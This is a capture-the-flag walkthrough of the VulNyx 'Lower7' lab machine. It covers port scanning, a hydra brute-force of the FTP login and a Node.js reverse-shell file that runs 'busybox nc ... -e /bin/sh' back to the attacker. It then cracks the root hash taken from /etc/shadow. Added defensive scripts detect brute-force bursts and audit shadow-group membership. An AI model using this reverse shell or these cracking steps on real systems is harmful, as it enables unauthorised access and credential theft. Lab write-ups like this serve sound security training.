Vlx_Lower7

Target source: https://vulnyx.com/

Difficulty: Low

I. Information Gathering

1. Host discovery

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 14:48 +0800
Nmap scan report for 192.168.2.1
Host is up (0.0012s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0011s latency).
MAC Address: 08:00:27:B0:CD:45 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.94
Host is up (0.00083s latency).
MAC Address: 08:00:27:B2:ED:87 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 9.54 seconds

Target IP: 192.168.2.94

2. Port scanning

1) Full port scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.94
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 14:49 +0800
Nmap scan report for 192.168.2.94
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
3000/tcp open ppp
MAC Address: 08:00:27:D2:B0:98 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 36.70 seconds

Open ports: 21, 3000

2) Detailed service scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p21,3000 192.168.2.94
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 14:50 +0800
Nmap scan report for 192.168.2.94
Host is up (0.00086s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
3000/tcp open http Node.js (Express middleware)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
MAC Address: 08:00:27:D2:B0:98 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.72 seconds

3) UDP scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.94
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 14:48 +0800
Nmap scan report for 192.168.2.94
Host is up (0.00085s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:D2:B0:98 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 111.81 seconds

II. TCP21_Ftp

Connect to port 21 and try to log in as anonymous; the attempt fails.

┌──(root㉿kali)-[~]
└─# ftp 192.168.2.94
Connected to 192.168.2.94.
220 "Hello a.clark, Welcome to your FTP server."
Name (192.168.2.94:root):

The banner discloses the username a.clark.

Brute-force the password with hydra

┌──(root㉿kali)-[~/miaosec]
└─# hydra -t 4 -l a.clark -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.94 -F -I
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-19 16:34:13
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ftp://192.168.2.94:21/
[STATUS] 72.00 tries/min, 72 tries in 00:01h, 14344327 to do in 3320:27h, 4 active
[21][ftp] host: 192.168.2.94 login: a.clark password: dragon
[STATUS] attack finished for 192.168.2.94 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-19 16:35:29

The password is: dragon

Login succeeds

┌──(root㉿kali)-[~/miaosec]
└─# ftp 192.168.2.94
Connected to 192.168.2.94.
220 "Hello a.clark, Welcome to your FTP server."
Name (192.168.2.94:root): a.clark
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||39837|)
150 Here comes the directory listing.
226 Directory send OK.
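
Seen from the server side, the hydra run above is a burst of failed logins for one account from one client, ending in a success. The following added example (not part of the original write-up) flags that pattern; the log lines are constructed and assume vsftpd's default log layout, and the threshold and window are assumed values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines; layout assumed to match vsftpd's default log.
SAMPLE = [
    'Thu Mar 19 16:34:15 2026 [pid 2101] [a.clark] FAIL LOGIN: Client "192.168.2.4"',
    'Thu Mar 19 16:34:18 2026 [pid 2103] [a.clark] FAIL LOGIN: Client "192.168.2.4"',
    'Thu Mar 19 16:34:21 2026 [pid 2105] [a.clark] FAIL LOGIN: Client "192.168.2.4"',
    'Thu Mar 19 16:34:24 2026 [pid 2107] [a.clark] FAIL LOGIN: Client "192.168.2.4"',
    'Thu Mar 19 16:34:27 2026 [pid 2109] [a.clark] FAIL LOGIN: Client "192.168.2.4"',
    'Thu Mar 19 16:34:30 2026 [pid 2111] [a.clark] FAIL LOGIN: Client "192.168.2.4"',
    'Thu Mar 19 16:34:33 2026 [pid 2113] [a.clark] OK LOGIN: Client "192.168.2.4"',
    # Benign pattern: one typo, then a successful login (constructed user and client).
    'Thu Mar 19 16:40:02 2026 [pid 2200] [b.example] FAIL LOGIN: Client "192.168.2.50"',
    'Thu Mar 19 16:40:09 2026 [pid 2202] [b.example] OK LOGIN: Client "192.168.2.50"',
]

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ [\d:]{8} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]+)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)

def detect(lines, threshold=5, window=timedelta(seconds=60)):
    """Return alerts for failure bursts and for a success that follows one."""
    recent = defaultdict(deque)  # (ip, user) -> timestamps of recent failures
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m['ts'], '%a %b %d %H:%M:%S %Y')
        key = (m['ip'], m['user'])
        q = recent[key]
        while q and ts - q[0] > window:   # drop failures outside the window
            q.popleft()
        if m['result'] == 'FAIL':
            q.append(ts)
            if len(q) == threshold:       # alert once per burst
                alerts.append(('bruteforce', *key, ts))
        elif len(q) >= threshold:         # success right after a burst
            alerts.append(('success_after_bruteforce', *key, ts))
            q.clear()
    return alerts

if __name__ == '__main__':
    for alert in detect(SAMPLE):
        print(alert)
```

The second alert type is the one that matters for response: it marks the moment the guessed password worked, which is when the account should be treated as compromised.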

III. Gaining access as a.clark

Port 3000 is running a Node.js service, so upload a Node.js shell

const { exec } = require('child_process');

module.exports = (req, res) => {
  exec('busybox nc 192.168.2.4 4444 -e /bin/sh', (error, stdout) => {
    res.send(`${stdout.trim()}`);
  });
};

Upload it to the server

ftp> put rev.js
local: rev.js remote: rev.js
229 Entering Extended Passive Mode (|||40243|)
150 Ok to send data.
100% |***************************************************************************************************************************************| 190 0.97 MiB/s 00:00 ETA
226 Transfer complete.
190 bytes sent in 00:00 (127.34 KiB/s)

Request rev.js

curl http://192.168.2.94:3000/rev.js

A shell is obtained

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.94] 44180
id
uid=1000(a.clark) gid=1000(a.clark) grupos=1000(a.clark),42(shadow)
whoami
a.clark

Stabilize the shell

/usr/bin/script -qc /bin/bash /dev/null
# Press Ctrl+Z to suspend it
stty raw -echo; fg
# Press Enter
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

IV. Privilege escalation

The user a.clark is a member of the shadow group

a.clark@lower7:~$ id
uid=1000(a.clark) gid=1000(a.clark) grupos=1000(a.clark),42(shadow)

That means the account can read the shadow file; view /etc/shadow

a.clark@lower7:~$ cat /etc/shadow
root:$y$j9T$9VFLJjKZix0Ugj9YsoOCS.$z0FVk.1CCNx/YRzEmwjcz6z4oYqa7YD6QyXd52jxyLD:20374:0:99999:7:::
daemon:*:19676:0:99999:7:::
bin:*:19676:0:99999:7:::
sys:*:19676:0:99999:7:::
sync:*:19676:0:99999:7:::
games:*:19676:0:99999:7:::
man:*:19676:0:99999:7:::
lp:*:19676:0:99999:7:::
mail:*:19676:0:99999:7:::
news:*:19676:0:99999:7:::
uucp:*:19676:0:99999:7:::
proxy:*:19676:0:99999:7:::
www-data:*:19676:0:99999:7:::
backup:*:19676:0:99999:7:::
list:*:19676:0:99999:7:::
irc:*:19676:0:99999:7:::
_apt:*:19676:0:99999:7:::
nobody:*:19676:0:99999:7:::
systemd-network:!*:19676::::::
messagebus:!:19676::::::
sshd:!:19676::::::
a.clark:$y$j9T$bdXHrEdVSpm8nJ883AVV//$xAqdqEdokPrYPBIgIv68qKaU08mhJoWKrnI9WdyUpZB:20374:0:99999:7:::
ftp:!:20374::::::

This yields the root user's password hash: $y$j9T$9VFLJjKZix0Ugj9YsoOCS.$z0FVk.1CCNx/YRzEmwjcz6z4oYqa7YD6QyXd52jxyLD

Crack it with john

┌──(root㉿kali)-[/tmp]
└─# echo 'root:$y$j9T$9VFLJjKZix0Ugj9YsoOCS.$z0FVk.1CCNx/YRzEmwjcz6z4oYqa7YD6QyXd52jxyLD:20374:0:99999:7:::' > hash

┌──(root㉿kali)-[/tmp]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt hash
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bassman (root)
1g 0:00:01:12 DONE (2026-03-19 16:59) 0.01373g/s 230.7p/s 230.7c/s 230.7C/s ice-cream..yenifer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The root password is found: bassman

Switch to the root user

a.clark@lower7:~$ su root
Contraseña:
root@lower7:/home/a.clark# id
uid=0(root) gid=0(root) grupos=0(root)
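
The escalation above depends on a non-root account being in the shadow group. As an added example (not from the original write-up), this audit lists such accounts and the password hashes they can read for offline guessing; the file contents are constructed, with placeholder hashes.

```python
# Constructed file contents mirroring the layout on the target; hashes are placeholders.
GROUP = """root:x:0:
shadow:x:42:a.clark
a.clark:x:1000:
"""
PASSWD = """root:x:0:0:root:/root:/bin/bash
a.clark:x:1000:1000::/home/a.clark:/bin/bash
ftp:x:102:110::/srv/ftp:/usr/sbin/nologin
"""
SHADOW = """root:$y$j9T$PLACEHOLDERSALT$PLACEHOLDERHASH:20374:0:99999:7:::
daemon:*:19676:0:99999:7:::
sshd:!:19676::::::
a.clark:$y$j9T$PLACEHOLDERSALT$PLACEHOLDERHASH:20374:0:99999:7:::
"""
SCHEMES = {"y": "yescrypt", "6": "sha512crypt", "5": "sha256crypt", "1": "md5crypt"}

def shadow_readers(group_text, passwd_text, group="shadow"):
    """Non-root accounts in `group`, as supplementary or primary group."""
    gid, members = None, set()
    for line in group_text.splitlines():
        parts = line.strip().split(":")
        if len(parts) == 4 and parts[0] == group:
            gid = parts[2]
            members.update(u for u in parts[3].split(",") if u)
    for line in passwd_text.splitlines():
        parts = line.strip().split(":")
        if gid is not None and len(parts) >= 4 and parts[3] == gid:
            members.add(parts[0])  # primary group is the shadow group
    members.discard("root")
    return sorted(members)

def exposed_hashes(shadow_text):
    """Accounts with a usable hash (not locked with '*' or '!'), mapped to scheme."""
    out = {}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[1].startswith("$"):
            prefix = fields[1].split("$")[1]
            out[fields[0]] = SCHEMES.get(prefix, "unknown:" + prefix)
    return out

def audit(group_text, passwd_text, shadow_text):
    """Report who can read the shadow file and which hashes that exposes."""
    readers = shadow_readers(group_text, passwd_text)
    return {"readers": readers,
            "exposed": exposed_hashes(shadow_text) if readers else {}}

if __name__ == "__main__":
    print(audit(GROUP, PASSWD, SHADOW))
```

A non-empty `readers` list is the finding; the scheme column shows that a slow hash such as yescrypt only raises the cost per guess and does not protect a password that sits in a common wordlist.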

V. Reading the flags

root@lower7:/# cat /root/root.txt /home/a.clark/user.txt 
97b79229372dea359415afef3e350241
9f903b45d270a2d0b95c68b4f3aac03f

Vlx_Lower7
http://miao-sec.github.io/Vulnyx/Vlx-Lower7/
Author: Miao
Published: March 19, 2026
License: BY-MIAO